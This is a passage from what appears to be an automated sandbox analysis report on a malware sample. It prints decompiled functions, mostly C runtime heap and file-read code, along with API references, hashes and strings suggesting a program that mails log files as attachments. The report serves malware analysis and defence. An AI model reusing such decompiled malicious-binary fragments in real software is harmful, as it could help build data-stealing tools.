                                                                                                                                        • Part of subcall function 01307630: __EH_prolog.LIBCMT ref: 01307635
                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 013046CF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog$FileFind$Next$CurrentExecuteFirstProcessShell
                                                                                                                                      • String ID: #ATTACHMENT#$#LOGF#$#SUBJECT#$#TMPDIR#$.vbs$Log $open
                                                                                                                                      • API String ID: 4028092955-3615671631
                                                                                                                                      • Opcode ID: 366395788189e802d0b2f22de11a51c0984d89ce626f4fdba666ce3dc45f033e
                                                                                                                                      • Instruction ID: c2a05d653a730b455a37a6d8e854cce758547423d75ade2c1c264dad0b95cd26
                                                                                                                                      • Opcode Fuzzy Hash: 366395788189e802d0b2f22de11a51c0984d89ce626f4fdba666ce3dc45f033e
                                                                                                                                      • Instruction Fuzzy Hash: 52515375D000699ACB06F7BCD969BDEB7B8AF74608F908099D405631C2EF746F09CBA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0131431B(char _a4) {
                                                                                                                                      				char _v8;
                                                                                                                                      
                                                                                                                                      				_t26 = _a4;
                                                                                                                                      				_t52 =  *_a4;
                                                                                                                                      				if( *_a4 != 0x1324df0) {
                                                                                                                                      					E01314615(_t52);
                                                                                                                                      					_t26 = _a4;
                                                                                                                                      				}
                                                                                                                                      				E01314615( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                                                                      				E01314615( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                      				E01314615( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                      				E01314615( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                      				E01314615( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                      				E01314615( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                      				E01314615( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                      				E01314615( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                      				E01314615( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                      				_v8 =  &_a4;
                                                                                                                                      				E013141E1(5,  &_v8);
                                                                                                                                      				_v8 =  &_a4;
                                                                                                                                      				return E01314231(4,  &_v8);
                                                                                                                                      			}




                                                                                                                                      0x01314321
                                                                                                                                      0x01314324
                                                                                                                                      0x0131432c
                                                                                                                                      0x0131432f
                                                                                                                                      0x01314334
                                                                                                                                      0x01314337
                                                                                                                                      0x0131433b
                                                                                                                                      0x01314346
                                                                                                                                      0x01314351
                                                                                                                                      0x0131435c
                                                                                                                                      0x01314367
                                                                                                                                      0x01314372
                                                                                                                                      0x0131437d
                                                                                                                                      0x01314388
                                                                                                                                      0x01314396
                                                                                                                                      0x0131439e
                                                                                                                                      0x013143a7
                                                                                                                                      0x013143af
                                                                                                                                      0x013143c3

                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 0131432F
                                                                                                                                        • Part of subcall function 01314615: HeapFree.KERNEL32(00000000,00000000,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?), ref: 0131462B
                                                                                                                                        • Part of subcall function 01314615: GetLastError.KERNEL32(?,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?,?), ref: 0131463D
                                                                                                                                      • _free.LIBCMT ref: 0131433B
                                                                                                                                      • _free.LIBCMT ref: 01314346
                                                                                                                                      • _free.LIBCMT ref: 01314351
                                                                                                                                      • _free.LIBCMT ref: 0131435C
                                                                                                                                      • _free.LIBCMT ref: 01314367
                                                                                                                                      • _free.LIBCMT ref: 01314372
                                                                                                                                      • _free.LIBCMT ref: 0131437D
                                                                                                                                      • _free.LIBCMT ref: 01314388
                                                                                                                                      • _free.LIBCMT ref: 01314396
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: b0f35a3ac03e9d3cf491fa0dbe2ed1bb18c5832e0c82fc56d3b40522d9759a21
                                                                                                                                      • Instruction ID: 8bca790b83558e660ecebf3673989f65ed83c17169659342752f3010d9f341a5
                                                                                                                                      • Opcode Fuzzy Hash: b0f35a3ac03e9d3cf491fa0dbe2ed1bb18c5832e0c82fc56d3b40522d9759a21
                                                                                                                                      • Instruction Fuzzy Hash: 0C11B376200109FFCB09EF98C940CDD7BB5EF5876CB5548A1FA488F225DB31EA509B80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                      			E0132082A(signed int _a4, void* _a8, unsigned int _a12) {
                                                                                                                                      				signed int _v5;
                                                                                                                                      				char _v6;
                                                                                                                                      				void* _v12;
                                                                                                                                      				unsigned int _v16;
                                                                                                                                      				signed int _v20;
                                                                                                                                      				signed int _v24;
                                                                                                                                      				signed int _v28;
                                                                                                                                      				void* _v32;
                                                                                                                                      				long _v36;
                                                                                                                                      				void* _v40;
                                                                                                                                      				long _v44;
                                                                                                                                      				signed int* _t143;
                                                                                                                                      				signed int _t145;
                                                                                                                                      				intOrPtr _t149;
                                                                                                                                      				signed int _t153;
                                                                                                                                      				signed int _t155;
                                                                                                                                      				signed char _t157;
                                                                                                                                      				unsigned int _t158;
                                                                                                                                      				intOrPtr _t162;
                                                                                                                                      				void* _t163;
                                                                                                                                      				signed int _t164;
                                                                                                                                      				signed int _t167;
                                                                                                                                      				long _t168;
                                                                                                                                      				intOrPtr _t175;
                                                                                                                                      				signed int _t176;
                                                                                                                                      				intOrPtr _t178;
                                                                                                                                      				signed int _t180;
                                                                                                                                      				signed int _t184;
                                                                                                                                      				char _t191;
                                                                                                                                      				char* _t192;
                                                                                                                                      				char _t199;
                                                                                                                                      				char* _t200;
                                                                                                                                      				signed char _t211;
                                                                                                                                      				signed int _t213;
                                                                                                                                      				long _t215;
                                                                                                                                      				signed int _t216;
                                                                                                                                      				char _t218;
                                                                                                                                      				signed char _t222;
                                                                                                                                      				signed int _t223;
                                                                                                                                      				unsigned int _t224;
                                                                                                                                      				intOrPtr _t225;
                                                                                                                                      				unsigned int _t229;
                                                                                                                                      				signed int _t231;
                                                                                                                                      				signed int _t232;
                                                                                                                                      				signed int _t233;
                                                                                                                                      				signed int _t234;
                                                                                                                                      				signed int _t235;
                                                                                                                                      				signed char _t236;
                                                                                                                                      				signed int _t237;
                                                                                                                                      				signed int _t239;
                                                                                                                                      				signed int _t240;
                                                                                                                                      				signed int _t241;
                                                                                                                                      				signed int _t242;
                                                                                                                                      				signed int _t246;
                                                                                                                                      				void* _t248;
                                                                                                                                      				void* _t249;
                                                                                                                                      
                                                                                                                                      				_t213 = _a4;
                                                                                                                                      				if(_t213 != 0xfffffffe) {
                                                                                                                                      					__eflags = _t213;
                                                                                                                                      					if(_t213 < 0) {
                                                                                                                                      						L58:
                                                                                                                                      						_t143 = E01313CBE();
                                                                                                                                      						 *_t143 =  *_t143 & 0x00000000;
                                                                                                                                      						__eflags =  *_t143;
                                                                                                                                      						 *((intOrPtr*)(E01313CD1())) = 9;
                                                                                                                                      						L59:
                                                                                                                                      						_t145 = E013110B9();
                                                                                                                                      						goto L60;
                                                                                                                                      					}
                                                                                                                                      					__eflags = _t213 -  *0x132f328; // 0x40
                                                                                                                                      					if(__eflags >= 0) {
                                                                                                                                      						goto L58;
                                                                                                                                      					}
                                                                                                                                      					_v24 = 1;
                                                                                                                                      					_t239 = _t213 >> 6;
                                                                                                                                      					_t235 = (_t213 & 0x0000003f) * 0x30;
                                                                                                                                      					_v20 = _t239;
                                                                                                                                      					_t149 =  *((intOrPtr*)(0x132f128 + _t239 * 4));
                                                                                                                                      					_v28 = _t235;
                                                                                                                                      					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                                                                                                                                      					_v5 = _t222;
                                                                                                                                      					__eflags = _t222 & 0x00000001;
                                                                                                                                      					if((_t222 & 0x00000001) == 0) {
                                                                                                                                      						goto L58;
                                                                                                                                      					}
                                                                                                                                      					_t223 = _a12;
                                                                                                                                      					__eflags = _t223 - 0x7fffffff;
                                                                                                                                      					if(_t223 <= 0x7fffffff) {
                                                                                                                                      						__eflags = _t223;
                                                                                                                                      						if(_t223 == 0) {
                                                                                                                                      							L57:
                                                                                                                                      							return 0;
                                                                                                                                      						}
                                                                                                                                      						__eflags = _v5 & 0x00000002;
                                                                                                                                      						if((_v5 & 0x00000002) != 0) {
                                                                                                                                      							goto L57;
                                                                                                                                      						}
                                                                                                                                      						__eflags = _a8;
                                                                                                                                      						if(_a8 == 0) {
                                                                                                                                      							goto L6;
                                                                                                                                      						}
                                                                                                                                      						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                                                                                                                                      						_v5 = _t153;
                                                                                                                                      						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                                                                                                                                      						_t246 = 0;
                                                                                                                                      						_t155 = _t153 - 1;
                                                                                                                                      						__eflags = _t155;
                                                                                                                                      						if(_t155 == 0) {
                                                                                                                                      							_t236 = _v24;
                                                                                                                                      							_t157 =  !_t223;
                                                                                                                                      							__eflags = _t236 & _t157;
                                                                                                                                      							if((_t236 & _t157) != 0) {
                                                                                                                                      								_t158 = 4;
                                                                                                                                      								_t224 = _t223 >> 1;
                                                                                                                                      								_v16 = _t158;
                                                                                                                                      								__eflags = _t224 - _t158;
                                                                                                                                      								if(_t224 >= _t158) {
                                                                                                                                      									_t158 = _t224;
                                                                                                                                      									_v16 = _t224;
                                                                                                                                      								}
                                                                                                                                      								_t246 = E013151CD(_t224, _t158);
                                                                                                                                      								E01314615(0);
                                                                                                                                      								E01314615(0);
                                                                                                                                      								_t249 = _t248 + 0xc;
                                                                                                                                      								_v12 = _t246;
                                                                                                                                      								__eflags = _t246;
                                                                                                                                      								if(_t246 != 0) {
                                                                                                                                      									_t162 = E0131FBCF(_t213, 0, 0, _v24);
                                                                                                                                      									_t225 =  *((intOrPtr*)(0x132f128 + _t239 * 4));
                                                                                                                                      									_t248 = _t249 + 0x10;
                                                                                                                                      									_t240 = _v28;
                                                                                                                                      									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                                                                                                                                      									_t163 = _t246;
                                                                                                                                      									 *(_t240 + _t225 + 0x24) = _t236;
                                                                                                                                      									_t235 = _t240;
                                                                                                                                      									_t223 = _v16;
                                                                                                                                      									L21:
                                                                                                                                      									_t241 = 0;
                                                                                                                                      									_v40 = _t163;
                                                                                                                                      									_t215 =  *((intOrPtr*)(0x132f128 + _v20 * 4));
                                                                                                                                      									_v36 = _t215;
                                                                                                                                      									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                                                                                                                                      									_t216 = _a4;
                                                                                                                                      									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                                                                                                                                      										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                                                                                                                                      										_v6 = _t218;
                                                                                                                                      										__eflags = _t218 - 0xa;
                                                                                                                                      										_t216 = _a4;
                                                                                                                                      										if(_t218 != 0xa) {
                                                                                                                                      											__eflags = _t223;
                                                                                                                                      											if(_t223 != 0) {
                                                                                                                                      												_t241 = _v24;
                                                                                                                                      												 *_t163 = _v6;
                                                                                                                                      												_t216 = _a4;
                                                                                                                                      												_t232 = _t223 - 1;
                                                                                                                                      												__eflags = _v5;
                                                                                                                                      												_v12 = _t163 + 1;
                                                                                                                                      												_v16 = _t232;
                                                                                                                                      												 *((char*)(_t235 +  *((intOrPtr*)(0x132f128 + _v20 * 4)) + 0x2a)) = 0xa;
                                                                                                                                      												if(_v5 != 0) {
                                                                                                                                      													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x132f128 + _v20 * 4)) + 0x2b));
                                                                                                                                      													_v6 = _t191;
                                                                                                                                      													__eflags = _t191 - 0xa;
                                                                                                                                      													if(_t191 != 0xa) {
                                                                                                                                      														__eflags = _t232;
                                                                                                                                      														if(_t232 != 0) {
                                                                                                                                      															_t192 = _v12;
                                                                                                                                      															_t241 = 2;
                                                                                                                                      															 *_t192 = _v6;
                                                                                                                                      															_t216 = _a4;
                                                                                                                                      															_t233 = _t232 - 1;
                                                                                                                                      															_v12 = _t192 + 1;
                                                                                                                                      															_v16 = _t233;
                                                                                                                                      															 *((char*)(_t235 +  *((intOrPtr*)(0x132f128 + _v20 * 4)) + 0x2b)) = 0xa;
                                                                                                                                      															__eflags = _v5 - _v24;
                                                                                                                                      															if(_v5 == _v24) {
                                                                                                                                      																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x132f128 + _v20 * 4)) + 0x2c));
                                                                                                                                      																_v6 = _t199;
                                                                                                                                      																__eflags = _t199 - 0xa;
                                                                                                                                      																if(_t199 != 0xa) {
                                                                                                                                      																	__eflags = _t233;
                                                                                                                                      																	if(_t233 != 0) {
                                                                                                                                      																		_t200 = _v12;
                                                                                                                                      																		_t241 = 3;
                                                                                                                                      																		 *_t200 = _v6;
                                                                                                                                      																		_t216 = _a4;
                                                                                                                                      																		_t234 = _t233 - 1;
                                                                                                                                      																		__eflags = _t234;
                                                                                                                                      																		_v12 = _t200 + 1;
                                                                                                                                      																		_v16 = _t234;
                                                                                                                                      																		 *((char*)(_t235 +  *((intOrPtr*)(0x132f128 + _v20 * 4)) + 0x2c)) = 0xa;
                                                                                                                                      																	}
                                                                                                                                      																}
                                                                                                                                      															}
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									_t164 = E0131DE26(_t216);
                                                                                                                                      									__eflags = _t164;
                                                                                                                                      									if(_t164 == 0) {
                                                                                                                                      										L41:
                                                                                                                                      										_v24 = 0;
                                                                                                                                      										L42:
                                                                                                                                      										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                                                                                                                                      										__eflags = _t167;
                                                                                                                                      										if(_t167 == 0) {
                                                                                                                                      											L53:
                                                                                                                                      											_t168 = GetLastError();
                                                                                                                                      											_t241 = 5;
                                                                                                                                      											__eflags = _t168 - _t241;
                                                                                                                                      											if(_t168 != _t241) {
                                                                                                                                      												__eflags = _t168 - 0x6d;
                                                                                                                                      												if(_t168 != 0x6d) {
                                                                                                                                      													L37:
                                                                                                                                      													E01313C9B(_t168);
                                                                                                                                      													goto L38;
                                                                                                                                      												}
                                                                                                                                      												_t242 = 0;
                                                                                                                                      												goto L39;
                                                                                                                                      											}
                                                                                                                                      											 *((intOrPtr*)(E01313CD1())) = 9;
                                                                                                                                      											 *(E01313CBE()) = _t241;
                                                                                                                                      											goto L38;
                                                                                                                                      										}
                                                                                                                                      										_t229 = _a12;
                                                                                                                                      										__eflags = _v36 - _t229;
                                                                                                                                      										if(_v36 > _t229) {
                                                                                                                                      											goto L53;
                                                                                                                                      										}
                                                                                                                                      										_t242 = _t241 + _v36;
                                                                                                                                      										__eflags = _t242;
                                                                                                                                      										L45:
                                                                                                                                      										_t237 = _v28;
                                                                                                                                      										_t175 =  *((intOrPtr*)(0x132f128 + _v20 * 4));
                                                                                                                                      										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                                                                                                                                      										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                                                                                                                                      											__eflags = _v5 - 2;
                                                                                                                                      											if(_v5 == 2) {
                                                                                                                                      												__eflags = _v24;
                                                                                                                                      												_push(_t242 >> 1);
                                                                                                                                      												_push(_v40);
                                                                                                                                      												_push(_t216);
                                                                                                                                      												if(_v24 == 0) {
                                                                                                                                      													_t176 = E01320499();
                                                                                                                                      												} else {
                                                                                                                                      													_t176 = E013207A9();
                                                                                                                                      												}
                                                                                                                                      											} else {
                                                                                                                                      												_t230 = _t229 >> 1;
                                                                                                                                      												__eflags = _t229 >> 1;
                                                                                                                                      												_t176 = E01320659(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                                                                                                                                      											}
                                                                                                                                      											_t242 = _t176;
                                                                                                                                      										}
                                                                                                                                      										goto L39;
                                                                                                                                      									}
                                                                                                                                      									_t231 = _v28;
                                                                                                                                      									_t178 =  *((intOrPtr*)(0x132f128 + _v20 * 4));
                                                                                                                                      									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                                                                                                                                      									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                                                                                                                                      										goto L41;
                                                                                                                                      									}
                                                                                                                                      									_t180 = GetConsoleMode(_v32,  &_v44);
                                                                                                                                      									__eflags = _t180;
                                                                                                                                      									if(_t180 == 0) {
                                                                                                                                      										goto L41;
                                                                                                                                      									}
                                                                                                                                      									__eflags = _v5 - 2;
                                                                                                                                      									if(_v5 != 2) {
                                                                                                                                      										goto L42;
                                                                                                                                      									}
                                                                                                                                      									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                                                                                                                                      									__eflags = _t184;
                                                                                                                                      									if(_t184 != 0) {
                                                                                                                                      										_t229 = _a12;
                                                                                                                                      										_t242 = _t241 + _v36 * 2;
                                                                                                                                      										goto L45;
                                                                                                                                      									}
                                                                                                                                      									_t168 = GetLastError();
                                                                                                                                      									goto L37;
                                                                                                                                      								} else {
                                                                                                                                      									 *((intOrPtr*)(E01313CD1())) = 0xc;
                                                                                                                                      									 *(E01313CBE()) = 8;
                                                                                                                                      									L38:
                                                                                                                                      									_t242 = _t241 | 0xffffffff;
                                                                                                                                      									__eflags = _t242;
                                                                                                                                      									L39:
                                                                                                                                      									E01314615(_t246);
                                                                                                                                      									return _t242;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							L15:
                                                                                                                                      							 *(E01313CBE()) =  *_t206 & _t246;
                                                                                                                                      							 *((intOrPtr*)(E01313CD1())) = 0x16;
                                                                                                                                      							E013110B9();
                                                                                                                                      							goto L38;
                                                                                                                                      						}
                                                                                                                                      						__eflags = _t155 != 1;
                                                                                                                                      						if(_t155 != 1) {
                                                                                                                                      							L13:
                                                                                                                                      							_t163 = _a8;
                                                                                                                                      							_v16 = _t223;
                                                                                                                                      							_v12 = _t163;
                                                                                                                                      							goto L21;
                                                                                                                                      						}
                                                                                                                                      						_t211 =  !_t223;
                                                                                                                                      						__eflags = _t211 & 0x00000001;
                                                                                                                                      						if((_t211 & 0x00000001) == 0) {
                                                                                                                                      							goto L15;
                                                                                                                                      						}
                                                                                                                                      						goto L13;
                                                                                                                                      					}
                                                                                                                                      					L6:
                                                                                                                                      					 *(E01313CBE()) =  *_t151 & 0x00000000;
                                                                                                                                      					 *((intOrPtr*)(E01313CD1())) = 0x16;
                                                                                                                                      					goto L59;
                                                                                                                                      				} else {
                                                                                                                                      					 *(E01313CBE()) =  *_t212 & 0x00000000;
                                                                                                                                      					_t145 = E01313CD1();
                                                                                                                                      					 *_t145 = 9;
                                                                                                                                      					L60:
                                                                                                                                      					return _t145 | 0xffffffff;
                                                                                                                                      				}
                                                                                                                                      			}



























































                                                                                                                                      0x01320833
                                                                                                                                      0x0132083a
                                                                                                                                      0x01320854
                                                                                                                                      0x01320856
                                                                                                                                      0x01320bbe
                                                                                                                                      0x01320bbe
                                                                                                                                      0x01320bc3
                                                                                                                                      0x01320bc3
                                                                                                                                      0x01320bcb
                                                                                                                                      0x01320bd1
                                                                                                                                      0x01320bd1
                                                                                                                                      0x00000000
                                                                                                                                      0x01320bd1
                                                                                                                                      0x0132085c
                                                                                                                                      0x01320862
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0132086a
                                                                                                                                      0x01320876
                                                                                                                                      0x01320879
                                                                                                                                      0x0132087c
                                                                                                                                      0x0132087f
                                                                                                                                      0x01320886
                                                                                                                                      0x01320889
                                                                                                                                      0x0132088d
                                                                                                                                      0x01320890
                                                                                                                                      0x01320893
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320899
                                                                                                                                      0x0132089c
                                                                                                                                      0x013208a2
                                                                                                                                      0x013208bc
                                                                                                                                      0x013208be
                                                                                                                                      0x01320bba
                                                                                                                                      0x00000000
                                                                                                                                      0x01320bba
                                                                                                                                      0x013208c4
                                                                                                                                      0x013208c8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013208ce
                                                                                                                                      0x013208d2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013208d9
                                                                                                                                      0x013208dd
                                                                                                                                      0x013208e0
                                                                                                                                      0x013208e3
                                                                                                                                      0x013208e8
                                                                                                                                      0x013208e8
                                                                                                                                      0x013208eb
                                                                                                                                      0x01320908
                                                                                                                                      0x0132090d
                                                                                                                                      0x0132090f
                                                                                                                                      0x01320911
                                                                                                                                      0x01320931
                                                                                                                                      0x01320932
                                                                                                                                      0x01320934
                                                                                                                                      0x01320937
                                                                                                                                      0x01320939
                                                                                                                                      0x0132093b
                                                                                                                                      0x0132093d
                                                                                                                                      0x0132093d
                                                                                                                                      0x01320948
                                                                                                                                      0x0132094a
                                                                                                                                      0x01320951
                                                                                                                                      0x01320956
                                                                                                                                      0x01320959
                                                                                                                                      0x0132095c
                                                                                                                                      0x0132095e
                                                                                                                                      0x01320983
                                                                                                                                      0x01320988
                                                                                                                                      0x0132098f
                                                                                                                                      0x01320992
                                                                                                                                      0x01320995
                                                                                                                                      0x01320999
                                                                                                                                      0x0132099b
                                                                                                                                      0x0132099f
                                                                                                                                      0x013209a1
                                                                                                                                      0x013209a4
                                                                                                                                      0x013209a7
                                                                                                                                      0x013209a9
                                                                                                                                      0x013209ac
                                                                                                                                      0x013209b3
                                                                                                                                      0x013209b6
                                                                                                                                      0x013209bb
                                                                                                                                      0x013209be
                                                                                                                                      0x013209c7
                                                                                                                                      0x013209cb
                                                                                                                                      0x013209ce
                                                                                                                                      0x013209d1
                                                                                                                                      0x013209d4
                                                                                                                                      0x013209da
                                                                                                                                      0x013209dc
                                                                                                                                      0x013209e5
                                                                                                                                      0x013209e8
                                                                                                                                      0x013209eb
                                                                                                                                      0x013209ee
                                                                                                                                      0x013209ef
                                                                                                                                      0x013209f3
                                                                                                                                      0x013209f9
                                                                                                                                      0x01320a03
                                                                                                                                      0x01320a08
                                                                                                                                      0x01320a18
                                                                                                                                      0x01320a1c
                                                                                                                                      0x01320a1f
                                                                                                                                      0x01320a21
                                                                                                                                      0x01320a23
                                                                                                                                      0x01320a25
                                                                                                                                      0x01320a27
                                                                                                                                      0x01320a2f
                                                                                                                                      0x01320a30
                                                                                                                                      0x01320a33
                                                                                                                                      0x01320a36
                                                                                                                                      0x01320a37
                                                                                                                                      0x01320a3d
                                                                                                                                      0x01320a47
                                                                                                                                      0x01320a4f
                                                                                                                                      0x01320a52
                                                                                                                                      0x01320a5e
                                                                                                                                      0x01320a62
                                                                                                                                      0x01320a65
                                                                                                                                      0x01320a67
                                                                                                                                      0x01320a69
                                                                                                                                      0x01320a6b
                                                                                                                                      0x01320a6d
                                                                                                                                      0x01320a75
                                                                                                                                      0x01320a76
                                                                                                                                      0x01320a79
                                                                                                                                      0x01320a7c
                                                                                                                                      0x01320a7c
                                                                                                                                      0x01320a7d
                                                                                                                                      0x01320a83
                                                                                                                                      0x01320a8d
                                                                                                                                      0x01320a8d
                                                                                                                                      0x01320a6b
                                                                                                                                      0x01320a67
                                                                                                                                      0x01320a52
                                                                                                                                      0x01320a25
                                                                                                                                      0x01320a21
                                                                                                                                      0x01320a08
                                                                                                                                      0x013209dc
                                                                                                                                      0x013209d4
                                                                                                                                      0x01320a93
                                                                                                                                      0x01320a99
                                                                                                                                      0x01320a9b
                                                                                                                                      0x01320b0e
                                                                                                                                      0x01320b0e
                                                                                                                                      0x01320b12
                                                                                                                                      0x01320b22
                                                                                                                                      0x01320b28
                                                                                                                                      0x01320b2a
                                                                                                                                      0x01320b86
                                                                                                                                      0x01320b86
                                                                                                                                      0x01320b8e
                                                                                                                                      0x01320b8f
                                                                                                                                      0x01320b91
                                                                                                                                      0x01320baa
                                                                                                                                      0x01320bad
                                                                                                                                      0x01320aea
                                                                                                                                      0x01320aeb
                                                                                                                                      0x00000000
                                                                                                                                      0x01320af0
                                                                                                                                      0x01320bb3
                                                                                                                                      0x00000000
                                                                                                                                      0x01320bb3
                                                                                                                                      0x01320b98
                                                                                                                                      0x01320ba3
                                                                                                                                      0x00000000
                                                                                                                                      0x01320ba3
                                                                                                                                      0x01320b2c
                                                                                                                                      0x01320b2f
                                                                                                                                      0x01320b32
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320b34
                                                                                                                                      0x01320b34
                                                                                                                                      0x01320b37
                                                                                                                                      0x01320b3a
                                                                                                                                      0x01320b3d
                                                                                                                                      0x01320b44
                                                                                                                                      0x01320b49
                                                                                                                                      0x01320b4b
                                                                                                                                      0x01320b4f
                                                                                                                                      0x01320b6a
                                                                                                                                      0x01320b6e
                                                                                                                                      0x01320b6f
                                                                                                                                      0x01320b72
                                                                                                                                      0x01320b73
                                                                                                                                      0x01320b7f
                                                                                                                                      0x01320b75
                                                                                                                                      0x01320b75
                                                                                                                                      0x01320b75
                                                                                                                                      0x01320b51
                                                                                                                                      0x01320b51
                                                                                                                                      0x01320b51
                                                                                                                                      0x01320b5c
                                                                                                                                      0x01320b61
                                                                                                                                      0x01320b64
                                                                                                                                      0x01320b64
                                                                                                                                      0x00000000
                                                                                                                                      0x01320b49
                                                                                                                                      0x01320aa0
                                                                                                                                      0x01320aa3
                                                                                                                                      0x01320aaa
                                                                                                                                      0x01320aaf
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320ab8
                                                                                                                                      0x01320abe
                                                                                                                                      0x01320ac0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320ac2
                                                                                                                                      0x01320ac6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01320ada
                                                                                                                                      0x01320ae0
                                                                                                                                      0x01320ae2
                                                                                                                                      0x01320b06
                                                                                                                                      0x01320b09
                                                                                                                                      0x00000000
                                                                                                                                      0x01320b09
                                                                                                                                      0x01320ae4
                                                                                                                                      0x00000000
                                                                                                                                      0x01320960
                                                                                                                                      0x01320965
                                                                                                                                      0x01320970
                                                                                                                                      0x01320af1
                                                                                                                                      0x01320af1
                                                                                                                                      0x01320af1
                                                                                                                                      0x01320af4
                                                                                                                                      0x01320af5
                                                                                                                                      0x00000000
                                                                                                                                      0x01320afd
                                                                                                                                      0x0132095e
                                                                                                                                      0x01320913
                                                                                                                                      0x01320918
                                                                                                                                      0x0132091f
                                                                                                                                      0x01320925
                                                                                                                                      0x00000000
                                                                                                                                      0x01320925
                                                                                                                                      0x013208ed
                                                                                                                                      0x013208f0
                                                                                                                                      0x013208fa
                                                                                                                                      0x013208fa
                                                                                                                                      0x013208fd
                                                                                                                                      0x01320900
                                                                                                                                      0x00000000
                                                                                                                                      0x01320900
                                                                                                                                      0x013208f4
                                                                                                                                      0x013208f6
                                                                                                                                      0x013208f8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013208f8
                                                                                                                                      0x013208a4
                                                                                                                                      0x013208a9
                                                                                                                                      0x013208b1
                                                                                                                                      0x00000000
                                                                                                                                      0x0132083c
                                                                                                                                      0x01320841
                                                                                                                                      0x01320844
                                                                                                                                      0x01320849
                                                                                                                                      0x01320bd6
                                                                                                                                      0x00000000
                                                                                                                                      0x01320bd6

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
